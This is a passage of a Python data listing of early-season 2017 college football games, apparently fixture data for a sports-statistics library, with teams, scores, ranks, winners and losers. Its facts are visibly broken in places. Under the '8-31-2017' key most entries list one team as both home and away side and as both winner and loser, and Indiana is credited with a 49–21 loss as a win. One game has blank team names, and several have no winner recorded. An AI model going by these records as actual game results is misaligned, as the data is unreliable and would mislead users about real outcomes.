'home_rank': 4,
'non_di': False,
'top_25': True,
'winning_name': 'USC',
'winning_abbr': 'southern-california',
'losing_name': 'Western Michigan',
'losing_abbr': 'western-michigan'},
{'boxscore': '2017-09-02-southern-methodist',
'away_name': 'Stephen F. Austin',
'away_abbr': 'Stephen F. Austin',
'away_score': 14,
'away_rank': None,
'home_name': 'SMU',
'home_abbr': 'southern-methodist',
'home_score': 58,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'SMU',
'winning_abbr': 'southern-methodist',
'losing_name': 'Stephen F. Austin',
'losing_abbr': 'Stephen F. Austin'},
{'boxscore': '2017-09-02-southern-mississippi',
'away_name': 'Kentucky',
'away_abbr': 'kentucky',
'away_score': 24,
'away_rank': None,
'home_name': 'Southern Mississippi',
'home_abbr': 'southern-mississippi',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Kentucky',
'winning_abbr': 'kentucky',
'losing_name': 'Southern Mississippi',
'losing_abbr': 'southern-mississippi'},
{'boxscore': '2017-09-02-texas',
'away_name': 'Maryland',
'away_abbr': 'maryland',
'away_score': 51,
'away_rank': None,
'home_name': 'Texas',
'home_abbr': 'texas',
'home_score': 41,
'home_rank': 23,
'non_di': False,
'top_25': True,
'winning_name': 'Maryland',
'winning_abbr': 'maryland',
'losing_name': 'Texas',
'losing_abbr': 'texas'},
{'boxscore': '2017-09-02-texas-christian',
'away_name': 'Jackson State',
'away_abbr': 'Jackson State',
'away_score': 0,
'away_rank': None,
'home_name': 'Texas Christian',
'home_abbr': 'texas-christian',
'home_score': 63,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-texas-state',
'away_name': '',
'away_abbr': '',
'away_score': 11,
'away_rank': None,
'home_name': 'Texas State',
'home_abbr': 'texas-state',
'home_score': 20,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas State',
'winning_abbr': 'texas-state',
'losing_name': '',
'losing_abbr': ''},
{'boxscore': '2017-09-02-texas-tech',
'away_name': 'Eastern Washington',
'away_abbr': 'Eastern Washington',
'away_score': 10,
'away_rank': None,
'home_name': 'Texas Tech',
'home_abbr': 'texas-tech',
'home_score': 56,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas Tech',
'winning_abbr': 'texas-tech',
'losing_name': 'Eastern Washington',
'losing_abbr': 'Eastern Washington'},
{'boxscore': '2017-09-02-tulane',
'away_name': 'Grambling State',
'away_abbr': 'Grambling State',
'away_score': 14,
'away_rank': None,
'home_name': 'Tulane',
'home_abbr': 'tulane',
'home_score': 43,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tulane',
'winning_abbr': 'tulane',
'losing_name': 'Grambling State',
'losing_abbr': 'Grambling State'},
{'boxscore': '2017-09-02-virginia',
'away_name': 'William & Mary',
'away_abbr': 'William & Mary',
'away_score': 10,
'away_rank': None,
'home_name': 'Virginia',
'home_abbr': 'virginia',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Virginia',
'winning_abbr': 'virginia',
'losing_name': 'William & Mary',
'losing_abbr': 'William & Mary'},
{'boxscore': '2017-09-02-washington-state',
'away_name': 'Montana State',
'away_abbr': 'Montana State',
'away_score': 0,
'away_rank': None,
'home_name': 'Washington State',
'home_abbr': 'washington-state',
'home_score': 31,
'home_rank': 24,
'non_di': True,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-western-kentucky',
'away_name': 'Eastern Kentucky',
'away_abbr': 'Eastern Kentucky',
'away_score': 17,
'away_rank': None,
'home_name': 'Western Kentucky',
'home_abbr': 'western-kentucky',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Western Kentucky',
'winning_abbr': 'western-kentucky',
'losing_name': 'Eastern Kentucky',
'losing_abbr': 'Eastern Kentucky'},
{'boxscore': '2017-09-01-army',
'away_name': 'Fordham',
'away_abbr': 'Fordham',
'away_score': 6,
'away_rank': None,
'home_name': 'Army',
'home_abbr': 'army',
'home_score': 64,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Army',
'winning_abbr': 'army',
'losing_name': 'Fordham',
'losing_abbr': 'Fordham'},
{'boxscore': '2017-09-01-colorado',
'away_name': 'Colorado State',
'away_abbr': 'colorado-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Colorado',
'home_abbr': 'colorado',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Colorado',
'winning_abbr': 'colorado',
'losing_name': 'Colorado State',
'losing_abbr': 'colorado-state'},
{'boxscore': '2017-09-01-eastern-michigan',
'away_name': 'Charlotte',
'away_abbr': 'charlotte',
'away_score': 7,
'away_rank': None,
'home_name': 'Eastern Michigan',
'home_abbr': 'eastern-michigan',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Eastern Michigan',
'winning_abbr': 'eastern-michigan',
'losing_name': 'Charlotte',
'losing_abbr': 'charlotte'},
{'boxscore': '2017-09-01-florida-atlantic',
'away_name': 'Navy',
'away_abbr': 'navy',
'away_score': 42,
'away_rank': None,
'home_name': 'Florida Atlantic',
'home_abbr': 'florida-atlantic',
'home_score': 19,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Navy',
'winning_abbr': 'navy',
'losing_name': 'Florida Atlantic',
'losing_abbr': 'florida-atlantic'},
{'boxscore': '2017-09-01-northern-illinois',
'away_name': 'Boston College',
'away_abbr': 'boston-college',
'away_score': 23,
'away_rank': None,
'home_name': 'Northern Illinois',
'home_abbr': 'northern-illinois',
'home_score': 20,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boston College',
'winning_abbr': 'boston-college',
'losing_name': 'Northern Illinois',
'losing_abbr': 'northern-illinois'},
{'boxscore': '2017-09-01-rutgers',
'away_name': 'Washington',
'away_abbr': 'washington',
'away_score': 30,
'away_rank': 8,
'home_name': 'Rutgers',
'home_abbr': 'rutgers',
'home_score': 14,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Washington',
'winning_abbr': 'washington',
'losing_name': 'Rutgers',
'losing_abbr': 'rutgers'},
{'boxscore': '2017-09-01-syracuse',
'away_name': 'Central Connecticut State',
'away_abbr': 'Central Connecticut State',
'away_score': 7,
'away_rank': None,
'home_name': 'Syracuse',
'home_abbr': 'syracuse',
'home_score': 50,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Syracuse',
'winning_abbr': 'syracuse',
'losing_name': 'Central Connecticut State',
'losing_abbr': 'Central Connecticut State'},
{'boxscore': '2017-09-01-wisconsin',
'away_name': 'Utah State',
'away_abbr': 'utah-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Wisconsin',
'home_abbr': 'wisconsin',
'home_score': 59,
'home_rank': 9,
'non_di': False,
'top_25': True,
'winning_name': 'Wisconsin',
'winning_abbr': 'wisconsin',
'losing_name': 'Utah State',
'losing_abbr': 'utah-state'},
{'boxscore': '2017-08-31-arizona-state',
'away_name': 'New Mexico State',
'away_abbr': 'new-mexico-state',
'away_score': 31,
'away_rank': None,
'home_name': 'Arizona State',
'home_abbr': 'arizona-state',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Arizona State',
'winning_abbr': 'arizona-state',
'losing_name': 'New Mexico State',
'losing_abbr': 'new-mexico-state'},
{'boxscore': '2017-08-31-arkansas',
'away_name': 'Florida A&M',
'away_abbr': 'Florida A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'Arkansas',
'home_abbr': 'arkansas',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arkansas',
'winning_abbr': 'arkansas',
'losing_name': 'Florida A&M',
'losing_abbr': 'Florida A&M'},
{'boxscore': '2017-08-31-central-michigan',
'away_name': 'Rhode Island',
'away_abbr': 'Rhode Island',
'away_score': 27,
'away_rank': None,
'home_name': 'Central Michigan',
'home_abbr': 'central-michigan',
'home_score': 30,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Central Michigan',
'winning_abbr': 'central-michigan',
'losing_name': 'Rhode Island',
'losing_abbr': 'Rhode Island'},
{'boxscore': '2017-08-31-cincinnati',
'away_name': 'Austin Peay',
'away_abbr': 'Austin Peay',
'away_score': 14,
'away_rank': None,
'home_name': 'Cincinnati',
'home_abbr': 'cincinnati',
'home_score': 26,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Cincinnati',
'winning_abbr': 'cincinnati',
'losing_name': 'Austin Peay',
'losing_abbr': 'Austin Peay'},
{'boxscore': '2017-08-31-connecticut',
'away_name': 'Holy Cross',
'away_abbr': 'Holy Cross',
'away_score': 20,
'away_rank': None,
'home_name': 'Connecticut',
'home_abbr': 'connecticut',
'home_score': 27,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Connecticut',
'winning_abbr': 'connecticut',
'losing_name': 'Holy Cross',
'losing_abbr': 'Holy Cross'},
{'boxscore': '2017-08-31-georgia-state',
'away_name': 'Tennessee State',
'away_abbr': 'Tennessee State',
'away_score': 17,
'away_rank': None,
'home_name': 'Georgia State',
'home_abbr': 'georgia-state',
'home_score': 10,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tennessee State',
'winning_abbr': 'Tennessee State',
'losing_name': 'Georgia State',
'losing_abbr': 'georgia-state'},
{'boxscore': '2017-08-31-idaho',
'away_name': 'Sacramento State',
'away_abbr': 'Sacramento State',
'away_score': 6,
'away_rank': None,
'home_name': 'Idaho',
'home_abbr': 'idaho',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Idaho',
'winning_abbr': 'idaho',
'losing_name': 'Sacramento State',
'losing_abbr': 'Sacramento State'},
{'boxscore': '2017-08-31-indiana',
'away_name': 'Ohio State',
'away_abbr': 'ohio-state',
'away_score': 49,
'away_rank': 2,
'home_name': 'Indiana',
'home_abbr': 'indiana',
'home_score': 21,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Ohio State',
'winning_abbr': 'ohio-state',
'losing_name': 'Indiana',
'losing_abbr': 'indiana'},
{'boxscore': '2017-08-31-memphis',
'away_name': 'Louisiana-Monroe',
'away_abbr': 'louisiana-monroe',
'away_score': 29,
'away_rank': None,
'home_name': 'Memphis',
'home_abbr': 'memphis',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Memphis',
'winning_abbr': 'memphis',
'losing_name': 'Louisiana-Monroe',
'losing_abbr': 'louisiana-monroe'},
{'boxscore': '2017-08-31-minnesota',
'away_name': 'Buffalo',
'away_abbr': 'buffalo',
'away_score': 7,
'away_rank': None,
'home_name': 'Minnesota',
'home_abbr': 'minnesota',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Minnesota',
'winning_abbr': 'minnesota',
'losing_name': 'Buffalo',
'losing_abbr': 'buffalo'},
{'boxscore': '2017-08-31-toledo',
'away_name': 'Elon',
'away_abbr': 'Elon',
'away_score': 13,
'away_rank': None,
'home_name': 'Toledo',
'home_abbr': 'toledo',
'home_score': 47,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Toledo',
'winning_abbr': 'toledo',
'losing_name': 'Elon',
'losing_abbr': 'Elon'},
{'boxscore': '2017-08-31-utah',
'away_name': 'North Dakota',
'away_abbr': 'North Dakota',
'away_score': 16,
'away_rank': None,
'home_name': 'Utah',
'home_abbr': 'utah',
'home_score': 37,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Utah',
'winning_abbr': 'utah',
'losing_name': 'North Dakota',
'losing_abbr': 'North Dakota'},
{'boxscore': '2017-08-31-wake-forest',
'away_name': 'Presbyterian',
'away_abbr': 'Presbyterian',
'away_score': 7,
'away_rank': None,
'home_name': 'Wake Forest',
'home_abbr': 'wake-forest',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Wake Forest',
'winning_abbr': 'wake-forest',
'losing_name': 'Presbyterian',
'losing_abbr': 'Presbyterian'}
],
'8-31-2017': [
{'boxscore': '2017-08-31-arizona-state',
'away_name': 'Arizona State',
'away_abbr': 'arizona-state',
'away_score': 31,
'away_rank': None,
'home_name': 'Arizona State',
'home_abbr': 'arizona-state',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Arizona State',
'winning_abbr': 'arizona-state',
'losing_name': 'Arizona State',
'losing_abbr': 'arizona-state'},
{'boxscore': '2017-08-31-arkansas',
'away_name': 'Arkansas',
'away_abbr': 'arkansas',
'away_score': 7,
'away_rank': None,
'home_name': 'Arkansas',
'home_abbr': 'arkansas',
'home_score': 49,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Arkansas',
'winning_abbr': 'arkansas',
'losing_name': 'Arkansas',
'losing_abbr': 'arkansas'},
{'boxscore': '2017-08-31-central-michigan',
'away_name': 'Central Michigan',
'away_abbr': 'central-michigan',
'away_score': 27,
'away_rank': None,
'home_name': 'Central Michigan',
'home_abbr': 'central-michigan',
'home_score': 30,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Central Michigan',
'winning_abbr': 'central-michigan',
'losing_name': 'Central Michigan',
'losing_abbr': 'central-michigan'},
{'boxscore': '2017-08-31-cincinnati',
'away_name': 'Cincinnati',
'away_abbr': 'cincinnati',
'away_score': 14,
'away_rank': None,
'home_name': 'Cincinnati',
'home_abbr': 'cincinnati',
'home_score': 26,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Cincinnati',
'winning_abbr': 'cincinnati',
'losing_name': 'Cincinnati',
'losing_abbr': 'cincinnati'},
{'boxscore': '2017-08-31-connecticut',
'away_name': 'Connecticut',
'away_abbr': 'connecticut',
'away_score': 20,
'away_rank': None,
'home_name': 'Connecticut',
'home_abbr': 'connecticut',
'home_score': 27,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Connecticut',
'winning_abbr': 'connecticut',
'losing_name': 'Connecticut',
'losing_abbr': 'connecticut'},
{'boxscore': '2017-08-31-georgia-state',
'away_name': 'Georgia State',
'away_abbr': 'georgia-state',
'away_score': 17,
'away_rank': None,
'home_name': 'Georgia State',
'home_abbr': 'georgia-state',
'home_score': 10,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Georgia State',
'winning_abbr': 'georgia-state',
'losing_name': 'Georgia State',
'losing_abbr': 'georgia-state'},
{'boxscore': '2017-08-31-idaho',
'away_name': 'Idaho',
'away_abbr': 'idaho',
'away_score': 6,
'away_rank': None,
'home_name': 'Idaho',
'home_abbr': 'idaho',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Idaho',
'winning_abbr': 'idaho',
'losing_name': 'Idaho',
'losing_abbr': 'idaho'},
{'boxscore': '2017-08-31-indiana',
'away_name': 'Indiana',
'away_abbr': 'indiana',
'away_score': 49,
'away_rank': None,
'home_name': 'Indiana',
'home_abbr': 'indiana',
'home_score': 21,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Indiana',
'winning_abbr': 'indiana',
'losing_name': 'Indiana',
'losing_abbr': 'indiana'},
{'boxscore': '2017-08-31-memphis',
'away_name': 'Memphis',
'away_abbr': 'memphis',
'away_score': 29,
'away_rank': None,
'home_name': 'Memphis',
'home_abbr': 'memphis',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Memphis',
'winning_abbr': 'memphis',
'losing_name': 'Memphis',
'losing_abbr': 'memphis'},
{'boxscore': '2017-08-31-minnesota',
'away_name': 'Minnesota',
'away_abbr': 'minnesota',
'away_score': 7,
'away_rank': None,
'home_name': 'Minnesota',
'home_abbr': 'minnesota',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Minnesota',
'winning_abbr': 'minnesota',
'losing_name': 'Minnesota',
'losing_abbr': 'minnesota'},
{'boxscore': '2017-08-31-oklahoma-state',
'away_name': 'Oklahoma State',
'away_abbr': 'oklahoma-state',
'away_score': 24,
'away_rank': 10,
'home_name': 'Oklahoma State',
'home_abbr': 'oklahoma-state',
'home_score': 59,
'home_rank': 10,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma State',
'winning_abbr': 'oklahoma-state',
'losing_name': 'Oklahoma State',
'losing_abbr': 'oklahoma-state'},
{'boxscore': '2017-08-31-toledo',
'away_name': 'Toledo',
'away_abbr': 'toledo',
'away_score': 13,
'away_rank': None,
'home_name': 'Toledo',
'home_abbr': 'toledo',
'home_score': 47,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Toledo',
'winning_abbr': 'toledo',
'losing_name': 'Toledo',
'losing_abbr': 'toledo'},
{'boxscore': '2017-08-31-utah',
'away_name': 'Utah',
'away_abbr': 'utah',
'away_score': 16,
'away_rank': None,
'home_name': 'Utah',
'home_abbr': 'utah',
'home_score': 37,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Utah',
'winning_abbr': 'utah',
'losing_name': 'Utah',
'losing_abbr': 'utah'},
{'boxscore': '2017-08-31-wake-forest',
'away_name': 'Wake Forest',
'away_abbr': 'wake-forest',
'away_score': 7,
'away_rank': None,
'home_name': 'Wake Forest',
'home_abbr': 'wake-forest',
'home_score': 51,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Wake Forest',
'winning_abbr': 'wake-forest',
'losing_name': 'Wake Forest',
'losing_abbr': 'wake-forest'},
{'boxscore': '2017-09-04-georgia-tech',
'away_name': 'Tennessee',
'away_abbr': 'tennessee',
'away_score': 42,
'away_rank': 25,
'home_name': 'Georgia Tech',
'home_abbr': 'georgia-tech',
'home_score': 41,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Tennessee',
'winning_abbr': 'tennessee',
'losing_name': 'Georgia Tech',
'losing_abbr': 'georgia-tech'},
{'boxscore': '2017-09-03-ucla',
'away_name': 'Texas A&M',
'away_abbr': 'texas-am',
'away_score': 44,
'away_rank': None,
'home_name': 'UCLA',
'home_abbr': 'ucla',
'home_score': 45,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCLA',
'winning_abbr': 'ucla',
'losing_name': 'Texas A&M',
'losing_abbr': 'texas-am'},
{'boxscore': '2017-09-03-virginia-tech',
'away_name': 'West Virginia',
'away_abbr': 'west-virginia',
'away_score': 24,
'away_rank': 22,
'home_name': 'Virginia Tech',
'home_abbr': 'virginia-tech',
'home_score': 31,
'home_rank': 21,
'non_di': False,
'top_25': True,
'winning_name': 'Virginia Tech',
'winning_abbr': 'virginia-tech',
'losing_name': 'West Virginia',
'losing_abbr': 'west-virginia'},
{'boxscore': '2017-09-02-air-force',
'away_name': 'Virginia Military Institute',
'away_abbr': 'Virginia Military Institute',
'away_score': 0,
'away_rank': None,
'home_name': 'Air Force',
'home_abbr': 'air-force',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-alabama-birmingham',
'away_name': 'Alabama A&M',
'away_abbr': 'Alabama A&M',
'away_score': 7,
'away_rank': None,
'home_name': 'UAB',
'home_abbr': 'alabama-birmingham',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'UAB',
'winning_abbr': 'alabama-birmingham',
'losing_name': 'Alabama A&M',
'losing_abbr': 'Alabama A&M'},
{'boxscore': '2017-09-02-arizona',
'away_name': 'Northern Arizona',
'away_abbr': 'Northern Arizona',
'away_score': 24,
'away_rank': None,
'home_name': 'Arizona',
'home_abbr': 'arizona',
'home_score': 62,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Arizona',
'winning_abbr': 'arizona',
'losing_name': 'Northern Arizona',
'losing_abbr': 'Northern Arizona'},
{'boxscore': '2017-09-02-auburn',
'away_name': 'Georgia Southern',
'away_abbr': 'georgia-southern',
'away_score': 7,
'away_rank': None,
'home_name': 'Auburn',
'home_abbr': 'auburn',
'home_score': 41,
'home_rank': 12,
'non_di': False,
'top_25': True,
'winning_name': 'Auburn',
'winning_abbr': 'auburn',
'losing_name': 'Georgia Southern',
'losing_abbr': 'georgia-southern'},
{'boxscore': '2017-09-02-baylor',
'away_name': 'Liberty',
'away_abbr': 'Liberty',
'away_score': 48,
'away_rank': None,
'home_name': 'Baylor',
'home_abbr': 'baylor',
'home_score': 45,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Liberty',
'winning_abbr': 'Liberty',
'losing_name': 'Baylor',
'losing_abbr': 'baylor'},
{'boxscore': '2017-09-02-boise-state',
'away_name': 'Troy',
'away_abbr': 'troy',
'away_score': 13,
'away_rank': None,
'home_name': 'Boise State',
'home_abbr': 'boise-state',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boise State',
'winning_abbr': 'boise-state',
'losing_name': 'Troy',
'losing_abbr': 'troy'},
{'boxscore': '2017-09-02-brigham-young',
'away_name': 'LSU',
'away_abbr': 'louisiana-state',
'away_score': 27,
'away_rank': 13,
'home_name': 'Brigham Young',
'home_abbr': 'brigham-young',
'home_score': 0,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-central-florida',
'away_name': 'Florida International',
'away_abbr': 'florida-international',
'away_score': 17,
'away_rank': None,
'home_name': 'UCF',
'home_abbr': 'central-florida',
'home_score': 61,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'UCF',
'winning_abbr': 'central-florida',
'losing_name': 'Florida International',
'losing_abbr': 'florida-international'},
{'boxscore': '2017-09-02-clemson',
'away_name': 'Kent State',
'away_abbr': 'kent-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Clemson',
'home_abbr': 'clemson',
'home_score': 56,
'home_rank': 5,
'non_di': False,
'top_25': True,
'winning_name': 'Clemson',
'winning_abbr': 'clemson',
'losing_name': 'Kent State',
'losing_abbr': 'kent-state'},
{'boxscore': '2017-09-02-coastal-carolina',
'away_name': 'Massachusetts',
'away_abbr': 'massachusetts',
'away_score': 28,
'away_rank': None,
'home_name': 'Coastal Carolina',
'home_abbr': 'coastal-carolina',
'home_score': 38,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Coastal Carolina',
'winning_abbr': 'coastal-carolina',
'losing_name': 'Massachusetts',
'losing_abbr': 'massachusetts'},
{'boxscore': '2017-09-02-duke',
'away_name': 'North Carolina Central',
'away_abbr': 'North Carolina Central',
'away_score': 7,
'away_rank': None,
'home_name': 'Duke',
'home_abbr': 'duke',
'home_score': 60,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Duke',
'winning_abbr': 'duke',
'losing_name': 'North Carolina Central',
'losing_abbr': 'North Carolina Central'},
{'boxscore': '2017-09-02-east-carolina',
'away_name': 'James Madison',
'away_abbr': 'James Madison',
'away_score': 34,
'away_rank': None,
'home_name': 'East Carolina',
'home_abbr': 'east-carolina',
'home_score': 14,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'James Madison',
'winning_abbr': 'James Madison',
'losing_name': 'East Carolina',
'losing_abbr': 'east-carolina'},
{'boxscore': '2017-09-02-florida-state',
'away_name': 'Alabama',
'away_abbr': 'alabama',
'away_score': 24,
'away_rank': 1,
'home_name': 'Florida State',
'home_abbr': 'florida-state',
'home_score': 7,
'home_rank': 3,
'non_di': False,
'top_25': True,
'winning_name': 'Alabama',
'winning_abbr': 'alabama',
'losing_name': 'Florida State',
'losing_abbr': 'florida-state'},
{'boxscore': '2017-09-02-fresno-state',
'away_name': 'Incarnate Word',
'away_abbr': 'Incarnate Word',
'away_score': 0,
'away_rank': None,
'home_name': 'Fresno State',
'home_abbr': 'fresno-state',
'home_score': 66,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-georgia',
'away_name': 'Appalachian State',
'away_abbr': 'appalachian-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Georgia',
'home_abbr': 'georgia',
'home_score': 31,
'home_rank': 15,
'non_di': False,
'top_25': True,
'winning_name': 'Georgia',
'winning_abbr': 'georgia',
'losing_name': 'Appalachian State',
'losing_abbr': 'appalachian-state'},
{'boxscore': '2017-09-02-hawaii',
'away_name': 'Western Carolina',
'away_abbr': 'Western Carolina',
'away_score': 18,
'away_rank': None,
'home_name': 'Hawaii',
'home_abbr': 'hawaii',
'home_score': 41,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Hawaii',
'winning_abbr': 'hawaii',
'losing_name': 'Western Carolina',
'losing_abbr': 'Western Carolina'},
{'boxscore': '2017-09-02-illinois',
'away_name': 'Ball State',
'away_abbr': 'ball-state',
'away_score': 21,
'away_rank': None,
'home_name': 'Illinois',
'home_abbr': 'illinois',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Illinois',
'winning_abbr': 'illinois',
'losing_name': 'Ball State',
'losing_abbr': 'ball-state'},
{'boxscore': '2017-09-02-iowa',
'away_name': 'Wyoming',
'away_abbr': 'wyoming',
'away_score': 3,
'away_rank': None,
'home_name': 'Iowa',
'home_abbr': 'iowa',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Iowa',
'winning_abbr': 'iowa',
'losing_name': 'Wyoming',
'losing_abbr': 'wyoming'},
{'boxscore': '2017-09-02-iowa-state',
'away_name': 'Northern Iowa',
'away_abbr': 'Northern Iowa',
'away_score': 24,
'away_rank': None,
'home_name': 'Iowa State',
'home_abbr': 'iowa-state',
'home_score': 42,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Iowa State',
'winning_abbr': 'iowa-state',
'losing_name': 'Northern Iowa',
'losing_abbr': 'Northern Iowa'},
{'boxscore': '2017-09-02-kansas',
'away_name': 'Southeast Missouri State',
'away_abbr': 'Southeast Missouri State',
'away_score': 16,
'away_rank': None,
'home_name': 'Kansas',
'home_abbr': 'kansas',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Kansas',
'winning_abbr': 'kansas',
'losing_name': 'Southeast Missouri State',
'losing_abbr': 'Southeast Missouri State'},
{'boxscore': '2017-09-02-kansas-state',
'away_name': 'Central Arkansas',
'away_abbr': 'Central Arkansas',
'away_score': 19,
'away_rank': None,
'home_name': 'Kansas State',
'home_abbr': 'kansas-state',
'home_score': 55,
'home_rank': 20,
'non_di': True,
'top_25': True,
'winning_name': 'Kansas State',
'winning_abbr': 'kansas-state',
'losing_name': 'Central Arkansas',
'losing_abbr': 'Central Arkansas'},
{'boxscore': '2017-09-02-louisiana-lafayette',
'away_name': 'Southeastern Louisiana',
'away_abbr': 'Southeastern Louisiana',
'away_score': 48,
'away_rank': None,
'home_name': 'Louisiana',
'home_abbr': 'louisiana-lafayette',
'home_score': 51,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana',
'winning_abbr': 'louisiana-lafayette',
'losing_name': 'Southeastern Louisiana',
'losing_abbr': 'Southeastern Louisiana'},
{'boxscore': '2017-09-02-louisiana-tech',
'away_name': 'Northwestern State',
'away_abbr': 'Northwestern State',
'away_score': 24,
'away_rank': None,
'home_name': 'Louisiana Tech',
'home_abbr': 'louisiana-tech',
'home_score': 52,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana Tech',
'winning_abbr': 'louisiana-tech',
'losing_name': 'Northwestern State',
'losing_abbr': 'Northwestern State'},
{'boxscore': '2017-09-02-marshall',
'away_name': 'Miami (OH)',
'away_abbr': 'miami-oh',
'away_score': 26,
'away_rank': None,
'home_name': 'Marshall',
'home_abbr': 'marshall',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Marshall',
'winning_abbr': 'marshall',
'losing_name': 'Miami (OH)',
'losing_abbr': 'miami-oh'},
{'boxscore': '2017-09-02-miami-fl',
'away_name': 'Bethune-Cookman',
'away_abbr': 'Bethune-Cookman',
'away_score': 13,
'away_rank': None,
'home_name': 'Miami (FL)',
'home_abbr': 'miami-fl',
'home_score': 41,
'home_rank': 18,
'non_di': True,
'top_25': True,
'winning_name': 'Miami (FL)',
'winning_abbr': 'miami-fl',
'losing_name': 'Bethune-Cookman',
'losing_abbr': 'Bethune-Cookman'},
{'boxscore': '2017-09-02-michigan',
'away_name': 'Florida',
'away_abbr': 'florida',
'away_score': 17,
'away_rank': 17,
'home_name': 'Michigan',
'home_abbr': 'michigan',
'home_score': 33,
'home_rank': 11,
'non_di': False,
'top_25': True,
'winning_name': 'Michigan',
'winning_abbr': 'michigan',
'losing_name': 'Florida',
'losing_abbr': 'florida'},
{'boxscore': '2017-09-02-michigan-state',
'away_name': 'Bowling Green State',
'away_abbr': 'bowling-green-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Michigan State',
'home_abbr': 'michigan-state',
'home_score': 35,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Michigan State',
'winning_abbr': 'michigan-state',
'losing_name': 'Bowling Green State',
'losing_abbr': 'bowling-green-state'},
{'boxscore': '2017-09-02-middle-tennessee-state',
'away_name': 'Vanderbilt',
'away_abbr': 'vanderbilt',
'away_score': 28,
'away_rank': None,
'home_name': 'Middle Tennessee State',
'home_abbr': 'middle-tennessee-state',
'home_score': 6,
'home_rank': None,
'non_di': False,
'top_25': False,
